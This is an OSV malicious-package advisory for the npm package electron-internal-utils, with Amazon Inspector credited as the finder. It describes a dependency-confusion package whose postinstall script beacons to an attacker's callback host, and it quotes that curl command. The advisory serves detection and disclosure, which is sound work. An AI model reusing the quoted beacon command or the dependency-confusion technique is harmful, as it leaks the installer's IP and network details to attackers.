MAL-2026-6186

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/electron-internal-utils/MAL-2026-6186.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6186

Published

2026-06-19T04:56:31Z

Modified

2026-06-19T05:31:48.792256540Z

Summary

Malicious code in electron-internal-utils (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef)

On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io, an out-of-band DNS/HTTP interaction service controlled by the package author. The callback signals the attacker that the package was installed on the host and leaks the installer's public IP and DNS resolver metadata. The package ships no functionality (index.js contains only module.exports = {};) and its name impersonates the Electron project's internal-utilities namespace, consistent with a dependency-confusion attack against projects that reference internal Electron helpers. Any environment that runs npm install on this package will silently beacon to attacker-controlled infrastructure.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T04:56:31Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-007049",
            "import_time": "2026-06-19T05:16:49.090375831Z"
        }
    ]
}

References

https://www.npmjs.com/package/electron-internal-utils/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / electron-internal-utils

Package

Name: electron-internal-utils; View open source insights on deps.dev
Purl: pkg:npm/electron-internal-utils

Affected ranges

Affected versions

1.*

1.0.0

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/electron-internal-utils/MAL-2026-6186.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "7b3b2ec88dcfcbedaee1fe536abb9e4b78f51018ca104128c33522f9880a0009",
            "tlsh": "ebc0123058115e3315cd4b5a7979854665614e1f5055e4148393151841ee3f6a8ef70e",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-krKMzUJSU9Ef56nrOpmQ+an6PPZNbYq3I5s4CMOmqoUzlpm/FhBw6Omx+ZwojIU4XdHZVrbp3BrLTDgzHHkPyw==",
                "sha1": "7c26f177a6a10e422b56f24090dab181a3c067a3"
            },
            "filename": "electron-internal-utils-1.0.0.tgz"
        }
    ]
}